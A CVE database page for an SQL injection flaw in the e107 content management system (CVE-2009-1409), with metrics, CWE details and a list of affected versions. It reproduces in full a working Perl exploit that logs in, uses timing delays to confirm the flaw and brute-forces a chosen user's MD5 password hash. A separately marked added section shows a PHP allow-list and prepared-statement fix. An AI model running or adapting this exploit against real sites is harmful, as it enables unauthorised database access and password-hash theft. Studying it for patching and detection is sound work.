CVE-2009-1409: Details

CVE-2009-1409

SQL Injection
A03-Injection
1.77%V3
Network
2009-04-24 12h00 +00:00
2017-09-28 10h57 +00:00

CVE Descriptions

SQL injection vulnerability in usersettings.php in e107 0.7.15 and earlier, when "Extended User Fields" is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the hide parameter, a different vector than CVE-2005-4224 and CVE-2008-5320.

CVE Information

Related Weaknesses

| CWE-ID | Weakness name | Source |
| --- | --- | --- |
| CWE-89 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | |

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
| --- | --- | --- | --- | --- |
| V2 | 5.1 | | AV:N/AC:H/Au:N/C:P/I:P/A:P | nvd@nist.gov |

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 8495

Publication date: 2009-04-19 22h00 +00:00
Author: StAkeR
EDB Verified: Yes

```perl
#!/usr/bin/env perl
#
# e107 <= 0.7.15 "extended_user_fields" Blind SQL Injection Exploit
#
# Description
# -------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "usersettings.php" script
# not properly sanitizing user-supplied input to the hide[] key.
# This may allow an attacker to inject or manipulate sql queries in
# the backend database if magic_quotes_gpc = off.
# -------------------------------------------------------------------
# Code Details (usersettings.php)
# -------------------------------------------------------------------
# Line 433 - 441
#
# if($ue_fields) {
#     $hidden_fields = implode("^", array_keys($_POST['hide'])); <------ {1}
#
#     if($hidden_fields != "")
#     {
#         $hidden_fields = "^".$hidden_fields."^";
#     }
#     $ue_fields .= ", user_hidden_fields = '".$hidden_fields."'"; <---- {2}
# }
#
# Line 470 - 476
#
# if($ue_fields)
# {
#     [etc..]
#     $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'");
# }
#
# ue[] POST variable needs a valid key
# such as "aim","msn" or other user_extended_fields
# (@fields array).
#
# Fix this sql injection using (php function)
# mysql_real_escape_string to the POST 'hide' key,
# otherwise find a way to fix it. dont care
# ------------------------------------------
# Discovered & Written
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it
#
# Thanks to
# ---------------------------------------------
# JosS,girex,str0ke,certaindeath,plucky
# #zeroidentity chan - http://zeroidentity.org
# ---------------------------------------------
# http://www.youtube.com/watch?v=0rgInHvW8Ic
# http://www.youtube.com/watch?v=O2y62xcUJ8E
# ---------------------------------------------

use LWP::UserAgent;

my $prefix = "e107_"; # default table_prefix
my $type_i = undef;
my $sock_u = new LWP::UserAgent;

my ($domain,$user_name,$user_pwd,$target) = @ARGV;

e107::Usage() unless scalar (@ARGV) > 3;
e107::Login($user_name,$user_pwd);

$type_i = e107::ExtendedField();

e107::Exploit();

sub e107::Usage
{
    print "e107 <= 0.7.15 'extended_user_fields' Blind SQL Injection Exploit\n";
    print "Usage: perl xpl.pl http://[host]/[path] [username] [password] [target id]\n";
    print "Usage: perl xpl.pl http://localhost/e107 yeat an4rchy 1\n";
    exit;
}

sub e107::Exploit
{
    e107::Vulnerable();
    e107::BruteForce();
}

sub e107::SqlQuery
{
    my ($do_query,$response,$start,$down,$element);

    $do_query = $_[0] || die $!;
    $start = time();

    $response = $sock_u->post($domain.'/usersettings.php',
    [
        "email" => 'doesnt@exists.net',
        "ue[user_$type_i]" => 1,
        "hide[$do_query]" => 1,
        "updatesettings" => 'Save Settings',
    ]) or die $!;

    $down = time();

    return $down - $start;
}

sub e107::CheckField
{
    my ($do_query,$response,$start,$down,$element);

    $do_query = $_[0];
    $element = $_[1] || die $!;
    $start = time();

    $response = $sock_u->post($domain.'/usersettings.php',
    [
        "email" => 'doesnt@exists.net',
        "ue[user_$element]" => 1,
        "hide[$do_query]" => 1,
        "updatesettings" => 'Save Settings',
    ]) or die $!;

    $down = time();

    return $down - $start;
}

sub e107::ExtendedField
{
    my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');

    my $query = "\x27/**/OR/**/CASE/**/WHEN(1>0)/**/THEN".
                "/**/benchmark(100000000,CHAR(0))/**/END#";

    for (my $i=1;$i<8;$i++)
    {
        if (e107::CheckField($query,$fields[$i]) > 6)
        {
            return $fields[$i];
            last;
        }

        unless ($i != 8 && $fields[$i])
        {
            die("Site not vulnerable..\n");
        }
    }
}

sub e107::SqlBrute
{
    my $ascii = $_[0];
    my $limit = $_[1] || 1;

    my $sql_query = "\x27/**/OR/**/(SELECT/**/IF((ASCII(SUBSTRING(user_password,$limit,1))".
                    "=$ascii),benchmark(200000000,CHAR(0)),0)/**/FROM/**/${prefix}user/**/".
                    "WHERE/**/user_id=$target)#";

    return $sql_query;
}

sub e107::BruteForce
{
    my $i = 1;
    my @charset = (97..102,48..57);
    my $convert = undef;
    my $result = undef;

    for ($i..32)
    {
        foreach $convert (@charset)
        {
            if (e107::SqlQuery(e107::SqlBrute($convert,$i)) > 9)
            {
                syswrite(STDOUT,chr($convert));
                $i++;
                last;
                $result .= chr($convert);
            }
        }
    }

    unless (length($result) != 32)
    {
        print "\nHash MD5: $result\n";
        print "User ID: $target\n";
    }
}

sub e107::Vulnerable
{
    my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage');

    for (my $i=1;$i<8;$i++)
    {
        if ($fields[$i] eq $type_i)
        {
            print "Exploiting..\n";
            last;
        }
        else
        {
            die ("Site not vulnerable..\n");
        }
    }
}

sub e107::Login
{
    my ($username,$password) = @_;
    my ($result,$response);

    $response = $sock_u->post($domain.'/signup.php',
    [
        username => $username,
        userpass => $password,
        userlogin => 'Login',
        autologin => 0
    ]) or die $!;

    $result = $response->as_string;

    if ($result =~ /e107cookie=(\d+)\.([0-9a-f]{32})/i)
    {
        $sock_u->default_header('Cookie' => "e107cookie=$1.$2;");
        $sock_u->agent('Lynx (textmode) - Logged');
    }
    else
    {
        die("Login failed..\n");
    }
}

# milw0rm.com [2009-04-20]
```
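The code-details comment above shows the root cause: the array keys of `$_POST['hide']` are joined and concatenated into the `UPDATE` statement. The following is an added example, not e107's actual patch and not code from the original page, showing the same value built from an allow-list of known field names and then bound as a parameter rather than escaped with `mysql_real_escape_string`. The helper `build_hidden_fields`, the field names and the request data are hypothetical, and PDO with in-memory SQLite stands in for e107's own database class.

```php
<?php
// Added example, not e107 code. Field names and request data are constructed.

/**
 * Build the "^name^name^" value stored in user_hidden_fields, keeping only
 * keys that exactly match a known extended-field name (hypothetical helper).
 */
function build_hidden_fields($hide, array $allowed): string
{
    if (!is_array($hide)) {
        return '';                       // missing or scalar "hide": nothing to store
    }
    $keep = [];
    foreach (array_keys($hide) as $key) {
        $key = (string) $key;            // numeric keys arrive as int
        if (in_array($key, $allowed, true)) {
            $keep[] = $key;              // strict match only, no pattern matching
        }
    }
    return $keep ? '^' . implode('^', $keep) . '^' : '';
}

$allowed = ['user_aim', 'user_msn', 'user_homepage'];   // assumed configured fields

// Constructed request: one legitimate key and one key containing a quote.
$postHide = ['user_aim' => 1, "user_msn'injected" => 1];

$hidden = build_hidden_fields($postHide, $allowed);

// Second layer: bind the value instead of concatenating it into the UPDATE.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE user_extended (user_extended_id INTEGER PRIMARY KEY, user_hidden_fields TEXT)');
$pdo->exec("INSERT INTO user_extended VALUES (1, '')");

$stmt = $pdo->prepare(
    'UPDATE user_extended SET user_hidden_fields = :hidden WHERE user_extended_id = :id'
);
$stmt->execute([':hidden' => $hidden, ':id' => 1]);

// Read the row back to confirm that only the allow-listed key was stored.
$stored = $pdo->query('SELECT user_hidden_fields FROM user_extended WHERE user_extended_id = 1')
              ->fetchColumn();
var_dump($stored === '^user_aim^');
```

The allow-list rejects the key containing a quote before any SQL is built, and the bound parameter keeps the stored value as data even if the allow-list is later loosened.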

Products Mentioned

Configuration 0

E107>>E107 >> Version To (including) 0.7.15
E107>>E107 >> Version 0.6_10
E107>>E107 >> Version 0.6_11
E107>>E107 >> Version 0.6_12
E107>>E107 >> Version 0.6_13
E107>>E107 >> Version 0.6_14
E107>>E107 >> Version 0.6_15
E107>>E107 >> Version 0.6_15a
E107>>E107 >> Version 0.7
E107>>E107 >> Version 0.7.1
E107>>E107 >> Version 0.7.2
E107>>E107 >> Version 0.7.3
E107>>E107 >> Version 0.7.4
E107>>E107 >> Version 0.7.5
E107>>E107 >> Version 0.7.6
E107>>E107 >> Version 0.7.7
E107>>E107 >> Version 0.7.8
E107>>E107 >> Version 0.7.9
E107>>E107 >> Version 0.7.10
E107>>E107 >> Version 0.7.11
E107>>E107 >> Version 0.7.13
E107>>E107 >> Version 0.545
E107>>E107 >> Version 0.547_beta
E107>>E107 >> Version 0.548_beta
E107>>E107 >> Version 0.549_beta
E107>>E107 >> Version 0.551_beta
E107>>E107 >> Version 0.552_beta
E107>>E107 >> Version 0.553_beta
E107>>E107 >> Version 0.554
E107>>E107 >> Version 0.554_beta
E107>>E107 >> Version 0.555_beta
E107>>E107 >> Version 0.600
E107>>E107 >> Version 0.601
E107>>E107 >> Version 0.602
E107>>E107 >> Version 0.603
E107>>E107 >> Version 0.604
E107>>E107 >> Version 0.605
E107>>E107 >> Version 0.606
E107>>E107 >> Version 0.607
E107>>E107 >> Version 0.608
E107>>E107 >> Version 0.609
E107>>E107 >> Version 0.610
E107>>E107 >> Version 0.611
E107>>E107 >> Version 0.612
E107>>E107 >> Version 0.613
E107>>E107 >> Version 0.614
E107>>E107 >> Version 0.615
E107>>E107 >> Version 0.615a
E107>>E107 >> Version 0.616
E107>>E107 >> Version 0.617
E107>>E107 >> Version 0.6171
E107>>E107 >> Version 0.6172
E107>>E107 >> Version 0.6173
E107>>E107 >> Version 0.6174
E107>>E107 >> Version 0.6175
E107>>E107 >> Version 1.0.1
E107>>E107 >> Version 5.1
E107>>E107 >> Version 5.2
E107>>E107 >> Version 5.3_beta
E107>>E107 >> Version 5.3_beta2
E107>>E107 >> Version 5.04
E107>>E107 >> Version 5.4_beta1
E107>>E107 >> Version 5.4_beta3
E107>>E107 >> Version 5.4_beta4
E107>>E107 >> Version 5.4_beta5
E107>>E107 >> Version 5.4_beta6
E107>>E107 >> Version 5.05
E107>>E107 >> Version 5.21

References

http://secunia.com/advisories/34823
Tags: third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/53812
Tags: vdb-entry, x_refsource_OSVDB
https://www.exploit-db.com/exploits/8495
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/34614
Tags: vdb-entry, x_refsource_BID